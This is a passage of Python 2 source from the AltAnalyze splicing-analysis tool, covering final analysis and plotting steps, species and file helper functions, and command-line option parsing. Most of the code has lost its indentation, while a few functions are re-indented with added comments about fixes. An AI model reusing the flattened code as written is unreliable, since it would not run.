#for i in summary_data_db: universalPrintFunction([i+' '+ str(summary_data_db[i])])
exportSummaryResults(summary_results_db,analysis_method,aspire_output_list,aspire_output_gene_list,annotate_db,array_type,number_events_analyzed,root_dir)
else:
### Occurs for RNASeq when no junctions are present
summary_data_db2={}
if array_type == 'junction' or array_type == 'RNASeq':
#Reanalyze junction array data separately for individual probests rather than recipricol junctions
if array_type == 'junction': explicit_data_type = 'exon'
elif array_type == 'RNASeq': explicit_data_type = 'junction'
else: report_single_probeset_results = 'no'
### Obtain exon analysis defaults
expr_defaults, alt_exon_defaults, functional_analysis_defaults, goelite_defaults = UI.importDefaults('exon',species)
analysis_method, null, filter_probeset_types, null, null, alt_exon_fold_variable, null, null, null, null, null, null, null, calculate_normIntensity_p, null = alt_exon_defaults
filter_probesets_by = filter_probeset_types
if additional_algorithm == 'splicing-index' or additional_algorithm == 'FIRMA':
analysis_method = additional_algorithm
#print [analysis_method], [filter_probeset_types], [p_threshold], [alt_exon_fold_variable]
try: alt_exon_logfold_cutoff = math.log(float(additional_score),2)
except Exception: alt_exon_logfold_cutoff = 1
agglomerate_inclusion_probesets = 'no'
try:
summary_results_db, aspire_output_gene_list, number_events_analyzed = RunAltAnalyze()
exportSummaryResults(summary_results_db,analysis_method,aspire_output_list,aspire_output_gene_list,annotate_db,'exon',number_events_analyzed,root_dir)
if len(summary_data_db2)==0: summary_data_db2 = summary_data_db; explicit_data_type = 'exon-only'
#universalPrintFunction(['Alternative Exon Results for Individual Probeset Analyses:'])
#for i in summary_data_db: universalPrintFunction([i+' '+ str(summary_data_db[i])])
except Exception:
print traceback.format_exc()
None
#"""
### Perform dPSI Analysis
try:
if 'counts.' in fl.CountsFile(): pass
else:
dir_list = read_directory(fl.RootDir()+'ExpressionInput')
for file in dir_list:
if 'exp.' in file and 'steady-state' not in file:
fl.setExpFile(fl.RootDir()+'ExpressionInput/'+file)
#print [fl.RootDir()+'ExpressionInput/'+file]
if 'groups.' in file:
fl.setGroupsFile(search_dir+'/'+file)
except Exception:
search_dir = fl.RootDir()+'/ExpressionInput'
files = unique.read_directory(fl.RootDir()+'/ExpressionInput')
for file in files:
if 'exp.' in file and 'steady-state.txt' not in file:
fl.setExpFile(search_dir+'/'+file)
if 'groups.' in file:
fl.setGroupsFile(search_dir+'/'+file)
try:
#"""
try:
#"""
graphic_links2,cluster_input_file=ExpressionBuilder.unbiasedComparisonSpliceProfiles(fl.RootDir(),
species,array_type,expFile=fl.CountsFile(),min_events=1,med_events=1)
#"""
from import_scripts import AugmentEventAnnotations
psi_annotated = AugmentEventAnnotations.parse_junctionfiles(fl.RootDir()+'/AltResults/AlternativeOutput/',species,array_type) ### Added in 2.1.1 - adds cassette and domains annotations
except Exception:
print traceback.format_exc()
pass
#"""
inputpsi = fl.RootDir()+'AltResults/AlternativeOutput/'+species+'_'+array_type+'_top_alt_junctions-PSI-clust.txt'
useAdvancedMetaDataAnalysis = True
### Calculate ANOVA p-value stats based on groups
if array_type !='gene' and array_type != 'exon':
if useAdvancedMetaDataAnalysis:
from stats_scripts import metaDataAnalysis
if ge_ptype == 'adjp':
use_adjusted_pval = True
else:
use_adjusted_pval = False
try:
log_fold_cutoff = float(alt_exon_fold_variable)
if log_fold_cutoff == 0.1:
log_fold_cutoff = 0.1 ### For significant digits
except: log_fold_cutoff = 0.1
try:
if p_threshold <= 0 or p_threshold >1:
pvalThreshold = 0.05 ### A number less than one is invalid
else: pvalThreshold = p_threshold
except: pvalThreshold = ge_pvalue_cutoffs ### Use the gene expression p-value cutoff if NA
try:
graphics_alt = metaDataAnalysis.remoteAnalysis(species,psi_annotated,fl.GroupsFile(),
platform='PSI',log_fold_cutoff=0.1,use_adjusted_pval=use_adjusted_pval,
pvalThreshold=ge_pvalue_cutoffs)
try: summary_data_db['QC'] += graphics_alt
except Exception: summary_data_db['QC'] = graphics_alt
try: summary_data_db['QC'] += graphic_links2
except Exception: pass
except Exception:
print traceback.format_exc()
else:
matrix,compared_groups,original_data = statistics.matrixImport(inputpsi)
matrix_pvalues=statistics.runANOVA(inputpsi,matrix,compared_groups)
significantFilteredDir = statistics.returnANOVAFiltered(inputpsi,original_data,matrix_pvalues)
graphic_link1 = ExpressionBuilder.exportHeatmap(significantFilteredDir)
try: summary_data_db['QC']+=graphic_link1
except Exception: summary_data_db['QC']=graphic_link1
except Exception:
print traceback.format_exc()
import RNASeq
try:
graphic_link = RNASeq.compareExonAndJunctionResults(species,array_type,summary_results_db,root_dir)
try: summary_data_db['QC']+=graphic_link
except Exception: summary_data_db['QC']=graphic_link
except Exception:
print traceback.format_exc()
#"""
### Export the top 15 spliced genes
try:
altresult_dir = fl.RootDir()+'/AltResults/'
splicing_results_root = altresult_dir+'/Clustering/'
dir_list = read_directory(splicing_results_root)
gene_string=''
altanalyze_results_folder = altresult_dir+'/RawSpliceData/'+species
### Lookup the raw expression dir
expression_results_folder = string.replace(altresult_dir,'AltResults','ExpressionInput')
expression_dir = UI.getValidExpFile(expression_results_folder)
show_introns=False
try: altresult_dir = UI.getValidSplicingScoreFile(altanalyze_results_folder)
except Exception,e:
print traceback.format_exc()
analysisType='plot'
for file in dir_list:
if 'AltExonConfirmed' in file:
gene_dir = splicing_results_root+'/'+file
genes = UI.importGeneList(gene_dir,limit=50) ### list of gene IDs or symbols
gene_string = gene_string+','+genes
print 'Imported genes from',file,'\n'
analysisType='plot'
for file in dir_list:
if 'Combined-junction-exon-evidence' in file and 'top' not in file:
gene_dir = splicing_results_root+'/'+file
try: isoform_dir = UI.exportJunctionList(gene_dir,limit=50) ### list of gene IDs or symbols
except Exception: print traceback.format_exc()
UI.altExonViewer(species,array_type,expression_dir, gene_string, show_introns, analysisType, None); print 'completed'
UI.altExonViewer(species,array_type,altresult_dir, gene_string, show_introns, analysisType, None); print 'completed'
except Exception:
#print traceback.format_exc()
pass
if array_type != 'exon' and array_type != 'gene':
### SashimiPlot Visualization
try:
expression_results_folder = fl.RootDir()+'/ExpressionInput/'
expression_dir = UI.getValidExpFile(expression_results_folder)
show_introns=False
analysisType='plot'
top_PSI_junction = inputpsi
#isoform_dir2 = UI.exportJunctionList(top_PSI_junction,limit=50) ### list of gene IDs or symbols
altoutput_dir = export.findParentDir(top_PSI_junction)
isoform_dir2 = altoutput_dir+'/top'+str(50)+'/MultiPath-PSI.txt'
gene_string = UI.importGeneList(isoform_dir2,limit=50)
UI.altExonViewer(species,array_type,expression_dir, gene_string, show_introns, analysisType, None); print 'completed'
UI.altExonViewer(species,array_type,altresult_dir, gene_string, show_introns, analysisType, None); print 'completed'
except Exception:
print traceback.format_exc()
try:
analyzeBAMs = False
dir_list = unique.read_directory(fl.RootDir())
for file in dir_list:
if '.bam' in string.lower(file):
analyzeBAMs=True
if analyzeBAMs:
### Create sashimi plot index
from visualization_scripts import SashimiIndex
SashimiIndex.remoteIndexing(species,fl)
from visualization_scripts import SashimiPlot
print 'Exporting Sashimi Plots for the top-predicted splicing events... be patient'
try: SashimiPlot.remoteSashimiPlot(species,fl,fl.RootDir(),isoform_dir) ### assuming the bam files are in the root-dir
except Exception: pass # print traceback.format_exc()
print 'completed'
try: SashimiPlot.remoteSashimiPlot(species,fl,fl.RootDir(),isoform_dir2) ### assuming the bam files are in the root-dir
except Exception: pass #print traceback.format_exc()
print 'completed'
### Try again, in case the symbol conversion failed
SashimiPlot.justConvertFilenames(species,fl.RootDir()+'/SashimiPlots')
else:
print 'No BAM files present in the root directory... skipping SashimiPlot analysis...'
except Exception:
print traceback.format_exc()
try:
clearObjectsFromMemory(exon_db); clearObjectsFromMemory(constitutive_probeset_db)
clearObjectsFromMemory(go_annotations); clearObjectsFromMemory(original_microRNA_z_score_data)
clearObjectsFromMemory(last_exon_region_db)
"""
print 'local vars'
all = [var for var in locals() if (var[:2], var[-2:]) != ("__", "__")]
for var in all:
try:
if len(locals()[var])>500: print var, len(locals()[var])
except Exception: null=[]
"""
except Exception: null=[]
#print '!!!!!finished'
#returnLargeGlobalVars()
end_time = time.time(); time_diff = int(end_time-start_time)
universalPrintFunction(["Analyses finished in %d seconds" % time_diff])
#universalPrintFunction(["Hit Enter/Return to exit AltAnalyze"])
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset]; results_dir = filepath(fl.RootDir())
### Perform GO-Elite Analysis
if pathway_permutations != 'NA':
goelite_run = False
print '\nBeginning to run GO-Elite analysis on alternative exon results'
elite_input_dirs = ['AltExonConfirmed','AltExon','regulated','upregulated','downregulated'] ### Run GO-Elite multiple times to ensure heatmaps are useful and to better organize results
for elite_dir in elite_input_dirs:
file_dirs = results_dir+'GO-Elite/'+elite_dir,results_dir+'GO-Elite/denominator',results_dir+'GO-Elite/'+elite_dir
input_dir = results_dir+'GO-Elite/'+elite_dir
try: input_files = read_directory(input_dir) ### Are there any files to analyze?
except Exception: input_files = []
if len(input_files)>0:
variables = species,mod,pathway_permutations,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,returnPathways,file_dirs,root
try: GO_Elite.remoteAnalysis(variables,'non-UI',Multi=mlp); goelite_run = True
except Exception,e:
print e
print "GO-Elite analysis failed"
try: GO_Elite.moveMAPPFinderFiles(file_dirs[0])
except Exception: print 'Input GO-Elite files could NOT be moved.'
try: GO_Elite.moveMAPPFinderFiles(file_dirs[1])
except Exception: print 'Input GO-Elite files could NOT be moved.'
if goelite_run == False:
print 'No GO-Elite input files to analyze (check your criterion).'
print_out = 'Analysis complete. AltAnalyze results\nexported to "AltResults/AlternativeOutput".'
try:
if root !='' and root !=None:
print "Analysis Complete\n";
UI.InfoWindow(print_out,'Analysis Completed!')
try: dataset_name = dataset_name
except: dataset_name = dataset
#tl = Toplevel(); SummaryResultsWindow(tl,'AS',results_dir,dataset_name,'specific',summary_data_db2)
tl = Toplevel(); SummaryResultsWindow(tl,'GE',results_dir,dataset_name,'specific',summary_data_db)
except Exception:
print traceback.format_exc()
pass #print 'Failed to open GUI.'
skip_intro = 'yes'
if root !='' and root !=None:
if pathway_permutations == 'NA' and run_from_scratch != 'Annotate External Results':
try: UI.getUpdatedParameters(array_type,species,run_from_scratch,file_dirs)
except Exception: pass
try: AltAnalyzeSetup('no')
except Exception: sys.exit()
def exportSummaryResults(summary_results_db,analysis_method,aspire_output_list,aspire_output_gene_list,annotate_db,array_type,number_events_analyzed,root_dir):
try:
ResultsExport_module.outputSummaryResults(summary_results_db,'',analysis_method,root_dir)
#ResultsExport_module.outputSummaryResults(summary_results_db2,'-uniprot_attributes',analysis_method)
ResultsExport_module.compareAltAnalyzeResults(aspire_output_list,annotate_db,number_events_analyzed,'no',analysis_method,array_type,root_dir)
ResultsExport_module.compareAltAnalyzeResults(aspire_output_gene_list,annotate_db,'','yes',analysis_method,array_type,root_dir)
except UnboundLocalError: print "...No results to summarize" ###Occurs if there is a problem parsing these files
def checkGOEliteProbesets(fn,species):
    """Return 'yes' if any probeset in the Affymetrix CSV annotation file 'fn'
    is already linked to an Ensembl or EntrezGene MOD gene for 'species',
    otherwise 'no'. Used to decide whether GO-Elite relationships exist."""
    ### Get all probesets in GO-Elite files
    import gene_associations
    mod_source = 'Ensembl'+'-'+'Affymetrix'
    try: ensembl_to_probeset_id = gene_associations.getGeneToUid(species,mod_source)
    except Exception: ensembl_to_probeset_id={}
    mod_source = 'EntrezGene'+'-'+'Affymetrix'
    try: entrez_to_probeset_id = gene_associations.getGeneToUid(species,mod_source)
    except Exception: entrez_to_probeset_id={}
    ### Union of all probesets known to either MOD
    probeset_db={}
    for gene in ensembl_to_probeset_id:
        for probeset in ensembl_to_probeset_id[gene]: probeset_db[probeset]=[]
    for gene in entrez_to_probeset_id:
        for probeset in entrez_to_probeset_id[gene]: probeset_db[probeset]=[]
    ###Import an Affymetrix array annotation file (from http://www.affymetrix.com) and parse out annotations
    csv_probesets = {}; x=0
    fn=filepath(fn); status = 'no'
    for line in open(fn,'r').readlines():
        probeset_data = string.replace(line,'\n','') #remove endline
        probeset_data = string.replace(probeset_data,'---','')
        affy_data = string.split(probeset_data[1:-1],'","')
        if x==0 and line[0]!='#':
            x=1; affy_headers = affy_data
            ### Locate the probeset-ID column once. The original wrapped this scan
            ### in a redundant 'for header in affy_headers' loop, repeating the
            ### same full scan len(headers) times (accidental O(n^2)).
            for y in range(len(affy_headers)):
                if 'Probe Set ID' in affy_headers[y] or 'probeset_id' in affy_headers[y]: ps = y
        elif x == 1:
            ### 'ps' is unbound if no probeset column was found; the except absorbs that
            try: probeset = affy_data[ps]; csv_probesets[probeset]=[]
            except Exception: null=[]
    for probeset in csv_probesets:
        if probeset in probeset_db: status = 'yes';break
    return status
class SpeciesData:
    """Simple record for one species: abbreviation code (e.g. 'Hs'), full
    species name, list of compatible annotation systems and NCBI taxonomy ID."""
    def __init__(self, abrev, species, systems, taxid):
        self._abrev = abrev; self._species = species; self._systems = systems; self._taxid = taxid
    def SpeciesCode(self): return self._abrev
    def SpeciesName(self): return self._species
    def Systems(self): return self._systems
    def TaxID(self): return self._taxid
    def __repr__(self):
        ### Fixed: original read 'SpeciesName' without 'self.', raising NameError
        return self.SpeciesCode()+'|'+self.SpeciesName()
def getSpeciesInfo():
    """Used by AltAnalyze: refresh species info through the UI module and
    return (species_codes, {abbreviation: full species name})."""
    UI.importSpeciesInfo()
    species_names={}
    for full_name in species_codes:
        ### Map each species code abbreviation back to its full name
        species_names[species_codes[full_name].SpeciesCode()] = full_name
    return species_codes,species_names
def importGOEliteSpeciesInfo():
    """Parse Config/goelite_species.txt into {species_name: SpeciesData}."""
    species_codes={}
    fn=filepath('Config/goelite_species.txt')
    header_seen = False
    for line in open(fn,'rU').readlines():
        data = cleanUpLine(line)
        abrev,species,taxid,compatible_mods = data.split('\t')
        if not header_seen:
            header_seen = True  ### first row is the column header
        else:
            mods = compatible_mods.split('|')
            species_codes[species] = SpeciesData(abrev,species,mods,taxid)
    return species_codes
def exportGOEliteSpeciesInfo(species_codes):
    """Write a {species_name: SpeciesData} dict to Config/goelite_species.txt.

    Emits a tab-delimited header followed by one row per species; entries
    whose name contains 'other' or 'all-' are excluded.
    """
    out = open(filepath('Config/goelite_species.txt'), 'w')
    out.write(string.join(['species_code', 'species_name', 'tax_id', 'compatible_algorithms'], '\t')+'\n')
    for species in species_codes:
        if 'other' in species or 'all-' in species:
            continue  # skip aggregate/placeholder entries
        sd = species_codes[species]
        mods = string.join(sd.Systems(), '|')
        row = [sd.SpeciesCode(), sd.SpeciesName(), sd.TaxID(), mods]
        out.write(string.join(row, '\t')+'\n')
    out.close()
def TimeStamp():
    """Return the current local date as a 'YYYYMMDD' string.

    Replaces the original manual zero-padding of month/day with the
    equivalent strftime format codes (%m and %d are always zero-padded),
    producing byte-identical output.
    """
    return time.strftime('%Y%m%d', time.localtime())
def verifyFile(filename):
    """Return 'found' when *filename* exists and has at least one line,
    otherwise 'not found' (missing file, unreadable file, or empty file)."""
    try:
        fn = filepath(filename)
        for line in open(fn, 'rU').xreadlines():
            return 'found'  # one readable line is enough
    except Exception:
        pass  # missing/unreadable path reports 'not found'
    return 'not found'
def verifyFileLength(filename):
    """Count the lines of *filename*, stopping after 10.

    Returns 0 when the file is missing, unreadable, or empty; otherwise a
    value in 1..10. Used as a cheap 'does this file have content' probe.
    """
    line_count = 0
    try:
        fh = open(filepath(filename), 'rU')
        for line in fh.xreadlines():
            line_count += 1
            if line_count > 9:
                break  # 10 lines is all callers need to know about
    except Exception:
        pass  # report whatever was counted before the failure
    return line_count
def verifyGroupFileFormat(filename):
    """Return True when any line of *filename* has exactly three
    tab-separated fields (the expected groups-file layout); False when no
    such line exists or the file cannot be read."""
    try:
        for line in open(filepath(filename), 'rU').xreadlines():
            fields = string.split(cleanUpLine(line), '\t')
            if len(fields) == 3:
                return True  # first well-formed line settles it
    except Exception:
        pass
    return False
def parseExcludeGuides(excludeGuides):
    """Read guide identifiers from the text file at *excludeGuides*.

    Returns one cleaned entry per line, skipping any line containing the
    word 'Guide' (treated as a header row).
    """
    guide_ids = []
    for raw_line in open(excludeGuides, 'rU').readlines():
        entry = cleanUpLine(raw_line)
        if 'Guide' in entry:
            continue  # header line, not an identifier
        guide_ids.append(entry)
    return guide_ids
def displayHelp():
fn=filepath('Documentation/commandline.txt')
print '\n################################################\nAltAnalyze Command-Line Help'
for line in open(fn,'rU').readlines():
print cleanUpLine(line)
print '\n################################################ - END HELP'
sys.exit()
def searchDirectory(directory,var):
    """Return a one-element list with the path of the first file in
    *directory* whose name contains *var*, expressed relative to the current
    gene-database version folder.

    Returns None implicitly when no file matches (callers must handle this).
    Fixes: removed an unreachable `break` that followed the `return`, and
    renamed the loop variable so it no longer shadows the `file` builtin.
    """
    directory = unique.filepath(directory)
    files = unique.read_directory(directory)
    version = unique.getCurrentGeneDatabaseVersion()
    for fname in files:
        if var in fname:
            ### Keep only the portion after the version folder name
            ### (drop the leading path separator with [1:])
            location = string.split(directory+'/'+fname, version)[1][1:]
            return [location]  # first match wins
###### Command Line Functions (AKA Headless Mode) ######
def commandLineRun():
print 'Running commandline options'
import getopt
#/hd3/home/nsalomonis/normalization/mir1 - boxer
#python AltAnalyze.py --species Mm --arraytype "3'array" --celdir "C:/CEL" --output "C:/CEL" --expname miR1_column --runGOElite yes --GEelitepval 0.01
#python AltAnalyze.py --species Hs --arraytype "3'array" --FEdir "C:/FEfiles" --output "C:/FEfiles" --channel_to_extract "green/red ratio" --expname cancer --runGOElite yes --GEelitepval 0.01
#python AltAnalyze.py --celdir "C:/CEL" --output "C:/CEL" --expname miR1_column
#open ./AltAnalyze.app --celdir "/Users/nsalomonis/Desktop" --output "/Users/nsalomonis/Desktop" --expname test
#python AltAnalyze.py --species Mm --arraytype "3'array" --expdir "C:/CEL/ExpressionInput/exp.miR1_column.txt" --output "C:/CEL" --runGOElite yes --GEelitepval 0.01
#python AltAnalyze.py --species Mm --platform RNASeq --bedDir "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles" --groupdir "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles/ExpressionInput/groups.test.txt" --compdir "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles/ExpressionInput/comps.test.txt" --output "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles" --expname "test"
#python AltAnalyze.py --species Mm --platform RNASeq --filterdir "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles/" --output "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/BedFiles"
#python AltAnalyze.py --expdir "/Users/nsalomonis/Desktop/Nathan/ExpressionInput/exp.test.txt" --exonMapFile "/Users/nsalomonis/Desktop/Nathan/hgu133_probe.txt" --species Hs --platform "3'array" --output "/Users/nsalomonis/Desktop/Nathan"
#python AltAnalyze.py --species Hs --platform "3'array" --expname test --channelToExtract green --FEdir /Users/saljh8/Downloads/AgllentTest/ --output /Users/saljh8/Downloads/AgllentTest/
global apt_location; global root_dir; global probability_statistic; global log_file; global summary_data_db; summary_data_db={}
###required
marker_finder='no'
manufacturer='Affymetrix'
constitutive_source='Ensembl'
ensembl_version = 'current'
species_code = None
species = None
main_input_folder = None
output_dir = None
array_type = None
input_annotation_file = None
groups_file = None
comps_file = None
input_cdf_file = None
exp_name = None
run_GOElite = 'yes'
visualize_qc_results = 'yes'
run_lineage_profiler = 'yes'
input_exp_file = ''
cel_file_dir = ''
input_stats_file = ''
input_filtered_dir = ''
external_annotation_dir = ''
xhyb_remove = 'no'
update_method = []
update_dbs = 'no'
analyze_all_conditions = 'no'
return_all = 'no'
additional_array_types = []
remove_intronic_junctions = 'no'
ignore_built_species = 'no'
build_exon_bedfile = 'no'
compendiumType = 'protein_coding'
probability_statistic = 'unpaired t-test'
specific_array_type = None
additional_resources = [None]
wpid = None
mod = 'Ensembl'
transpose = False
input_file_dir = None
denom_file_dir = None
image_export = []
selected_species = ['Hs','Mm','Rn'] ### These are the species that additional array types are currently supported
selected_platforms = ['AltMouse','exon','gene','junction']
returnPathways = 'no'
compendiumPlatform = 'gene'
exonMapFile = None
platformType = None ### This option is used to store the orignal platform type
perform_alt_analysis = 'no'
mappedExonAnalysis = False ### Map the original IDs to the RNA-Seq exon database (when True)
microRNA_prediction_method = None
pipelineAnalysis = True
OntologyID=''
PathwaySelection=''
GeneSetSelection=''
interactionDirs=[]
inputType='ID list'
Genes=''; genes=''
degrees='direct'
includeExpIDs=True
update_interactions=False
data_type = 'raw expression'
batch_effects = 'no'
channel_to_extract = None
normalization = False
justShowTheseIDs = ''
display=False
accessoryAnalysis=''
modelSize=None
geneModel=False
run_from_scratch = None
systemToUse = None ### For other IDs
custom_reference = False
multiThreading = True
genesToReport = 60
correlateAll = True
expression_data_format='log'
runICGS=False
IDtype=None
runKallisto = False
input_fastq_dir = ''
ChromiumSparseMatrix=''
perform_tests=False
testType = "fast"
inputTestData = "text"
customFASTA = None
filterFile = None
PearsonThreshold = 0.1
returnCentroids = 'community'
runCompleteWorkflow=True
referenceFull=None
k=None
labels=None
original_arguments = sys.argv
arguments=[]
for arg in original_arguments:
arg = string.replace(arg,'\xe2\x80\x9c','') ### These are non-standard forward quotes
arg = string.replace(arg,'\xe2\x80\x9d','') ### These are non-standard reverse quotes
arg = string.replace(arg,'\xe2\x80\x93','-') ### These are non-standard dashes
arg = string.replace(arg,'\x96','-') ### These are non-standard dashes
arg = string.replace(arg,'\x93','') ### These are non-standard forward quotes
arg = string.replace(arg,'\x94','') ### These are non-standard reverse quotes
arguments.append(arg)
print '\nArguments input:',arguments,'\n'
if '--help' in arguments[1:] or '--h' in arguments[1:]:
try: displayHelp() ### Print out a help file and quit
except Exception: print 'See: http://www.altanalyze.org for documentation and command-line help';sys.exit()
if 'AltAnalyze' in arguments[1]:
arguments = arguments[1:] ### Occurs on Ubuntu with the location of AltAnalyze being added to sys.argv (exclude this since no argument provided for this var)
try:
options, remainder = getopt.getopt(arguments[1:],'', ['species=', 'mod=','elitepval=', 'elitepermut=',
'method=','zscore=','pval=','num=',
'runGOElite=','denom=','output=','arraytype=',
'celdir=','expdir=','output=','statdir=',
'filterdir=','cdfdir=','csvdir=','expname=',
'dabgp=','rawexp=','avgallss=','logexp=',
'inclraw=','runalt=','altmethod=','altp=',
'probetype=','altscore=','GEcutoff=',
'exportnormexp=','calcNIp=','runMiDAS=',
'GEcutoff=','GEelitepval=','mirmethod=','ASfilter=',
'vendor=','GEelitefold=','update=','version=',
'analyzeAllGroups=','GEeliteptype=','force=',
'resources_to_analyze=', 'dataToAnalyze=','returnAll=',
'groupdir=','compdir=','annotatedir=','additionalScore=',
'additionalAlgorithm=','noxhyb=','platform=','bedDir=',
'altpermutep=','altpermute=','removeIntronOnlyJunctions=',
'normCounts=','buildExonExportFile=','groupStat=',
'compendiumPlatform=','rpkm=','exonExp=','specificArray=',
'ignoreBuiltSpecies=','ORAstat=','outputQCPlots=',
'runLineageProfiler=','input=','image=', 'wpid=',
'additional=','row_method=','column_method=',
'row_metric=','column_metric=','color_gradient=',
'transpose=','returnPathways=','compendiumType=',
'exonMapFile=','geneExp=','labels=','contrast=',
'plotType=','geneRPKM=','exonRPKM=','runMarkerFinder=',
'update_interactions=','includeExpIDs=','degrees=',
'genes=','inputType=','interactionDirs=','GeneSetSelection=',
'PathwaySelection=','OntologyID=','dataType=','combat=',
'channelToExtract=','showIntrons=','display=','join=',
'uniqueOnly=','accessoryAnalysis=','inputIDType=','outputIDType=',
'FEdir=','channelToExtract=','AltResultsDir=','geneFileDir=',
'AltResultsDir=','modelSize=','geneModel=','reference=',
'multiThreading=','multiProcessing=','genesToReport=',
'correlateAll=','normalization=','justShowTheseIDs=',
'direction=','analysisType=','algorithm=','rho=',
'clusterGOElite=','geneSetName=','runICGS=','IDtype=',
'CountsCutoff=','FoldDiff=','SamplesDiffering=','removeOutliers=',
'featurestoEvaluate=','restrictBy=','ExpressionCutoff=',
'excludeCellCycle=','runKallisto=','fastq_dir=','FDR=',
'reimportModelScores=','separateGenePlots=','ChromiumSparseMatrix=',
'test=','testType=','inputTestData=','customFASTA=','i=',
'excludeGuides=','cellHarmony=','BAM_dir=','filterFile=',
'correlationCutoff=','referenceType=','DE=','cellHarmonyMerge=',
'o=','dynamicCorrelation=','runCompleteWorkflow=','adjp=',
'fold=','performDiffExp=','centerMethod=', 'k=','bamdir=',
'downsample=','query=','referenceFull=', 'maskGroups=',
'elite_dir=','numGenesExp='])
except Exception:
print traceback.format_exc()
print "There is an error in the supplied command-line arguments (each flag requires an argument)"; sys.exit()
for opt, arg in options:
#print [opt, arg]
if opt == '--species': species=arg
elif opt == '--arraytype':
if array_type != None: additional_array_types.append(arg)
else: array_type=arg; platform = array_type
if specific_array_type == None: specific_array_type = platform
elif opt == '--test':
try: perform_tests.append(arg)
except Exception: perform_tests = [arg]
elif opt == '--testType':
testType = arg
elif opt == '--inputTestData':
inputTestData = arg
elif opt == '--exonMapFile':
perform_alt_analysis = 'yes' ### Perform alternative exon analysis
exonMapFile = arg
elif opt == '--specificArray': specific_array_type = arg ### e.g., hGlue
elif opt == '--celdir':
arg = verifyPath(arg)
cel_file_dir=arg
elif opt == '--bedDir' or opt == '--BAM_dir' or opt == 'bamdir=' or opt == 'bamDir':
arg = verifyPath(arg)
cel_file_dir=arg
elif opt == '--ChromiumSparseMatrix':
arg = verifyPath(arg)
ChromiumSparseMatrix=arg
elif opt == '--FEdir':
arg = verifyPath(arg)
cel_file_dir = arg
elif opt == '--expdir':
arg = verifyPath(arg)
input_exp_file=arg
elif opt == '--statdir':
arg = verifyPath(arg)
input_stats_file=arg
elif opt == '--filterdir':
arg = verifyPath(arg)
input_filtered_dir=arg
elif opt == '--groupdir':
arg = verifyPath(arg)
groups_file=arg
elif opt == '--compdir':
arg = verifyPath(arg)
comps_file=arg
elif opt == '--cdfdir':
arg = verifyPath(arg)
input_cdf_file=arg
elif opt == '--csvdir':
arg = verifyPath(arg)
input_annotation_file=arg
elif opt == '--expname': exp_name=arg
elif opt == '--output' or opt == '--o':
arg = verifyPath(arg)
output_dir=arg
elif opt == '--vendor': manufacturer=arg
elif opt == '--runICGS': runICGS=True
elif opt == '--IDtype': IDtype=arg
elif opt == '--ignoreBuiltSpecies': ignore_built_species=arg
elif opt == '--platform':
if array_type != None: additional_array_types.append(arg)
else: array_type=arg; platform = array_type
if specific_array_type == None: specific_array_type = platform
elif opt == '--update': update_dbs='yes'; update_method.append(arg)
elif opt == '--version': ensembl_version = arg
elif opt == '--compendiumPlatform': compendiumPlatform=arg ### platform for which the LineageProfiler compendium is built on
elif opt == '--force': force=arg
elif opt == '--input' or opt == '--i' or opt == '--query':
arg = verifyPath(arg)
input_file_dir=arg
#input_exp_file=arg
pipelineAnalysis = False ### If this option is entered, only perform the indicated analysis
elif opt == '--image': image_export.append(arg)
elif opt == '--wpid': wpid=arg
elif opt == '--mod': mod=arg
elif opt == '--runKallisto':
if arg == 'yes' or string.lower(arg) == 'true':
runKallisto = True
elif opt == '--fastq_dir':
input_fastq_dir = arg
elif opt == '--customFASTA':
customFASTA = arg
elif opt == '--additional':
if additional_resources[0] == None:
additional_resources=[]
additional_resources.append(arg)
else:
additional_resources.append(arg)
elif opt == '--transpose':
if arg == 'True': transpose = True
elif opt == '--runLineageProfiler' or opt == '--cellHarmony': ###Variable declared here and later (independent analysis here or pipelined with other analyses later)
run_lineage_profiler=arg
elif opt == '--compendiumType': ### protein-coding, ncRNA, or exon
compendiumType=arg
elif opt == '--denom':
denom_file_dir=arg ### Indicates that GO-Elite is run independent from AltAnalyze itself
elif opt == '--accessoryAnalysis':
accessoryAnalysis = arg
elif opt == '--channelToExtract': channel_to_extract=arg
elif opt == '--genesToReport': genesToReport = int(arg)
elif opt == '--correlateAll': correlateAll = True
elif opt == '--direction': direction = arg
elif opt == '--logexp': expression_data_format=arg
elif opt == '--geneRPKM': rpkm_threshold=arg
elif opt == '--correlationCutoff': PearsonThreshold=float(arg)
elif opt == '--DE':
if string.lower(arg) == 'true':
DE = True
else:
DE = False
elif opt == '--referenceType':
if string.lower(arg) == 'centroid' or string.lower(arg) == 'mean':
returnCentroids = True; CenterMethod='centroid'
elif string.lower(arg) == 'medoid' or string.lower(arg) == 'median':
returnCentroids = True; CenterMethod='median'
elif string.lower(arg) == 'community' or string.lower(arg) == 'louvain':
returnCentroids = 'community'; CenterMethod='community'
elif string.lower(arg) == 'cells' or string.lower(arg) == 'cell':
returnCentroids = False; CenterMethod='centroid'
else:
returnCentroids = 'community'; CenterMethod='community'
elif opt == '--multiThreading' or opt == '--multiProcessing':
multiThreading=arg
if multiThreading == 'yes': multiThreading = True
elif 'rue' in multiThreading: multiThreading = True
else: multiThreading = False
if perform_tests != False:
### Requires the mouse RNASeq database
### python AltAnalyze.py --test --testType ICGS --inputTestData text
### python AltAnalyze.py --test --testType ICGS --inputTestData BAM
### python AltAnalyze.py --test --testType ICGS --inputTestData FASTQ
### python AltAnalyze.py --test --testType ICGS --inputTestData 10X
count = verifyFileLength('AltDatabase/demo_data/ReadMe.txt')
if count==0:
file_location_defaults = UI.importDefaultFileLocations()
goelite_url = file_location_defaults['goelite'].Location()
fln,status = update.download(goelite_url+'TestData/demo_data.zip','AltDatabase/NoVersion','')
if 'Internet' not in status: print "Demo data downloaded."
if 'ICGS' in perform_tests:
from tests.scripts import ICGS_test
if runKallisto:
inputTestData = "FASTQ"
ICGS_test.runICGStest(testType=testType,inputData=inputTestData)
sys.exit()
if 'other' in manufacturer or 'Other' in manufacturer:
### For other IDs
systemToUse = array_type
if array_type == None:
print 'Please indicate a ID type as --platform when setting vendor equal to "Other IDs"'; sys.exit()
array_type = "3'array"
if array_type == 'RNASeq': manufacturer = array_type
if platformType == None: platformType = array_type
if perform_alt_analysis == 'yes':
if platform == "3'array":
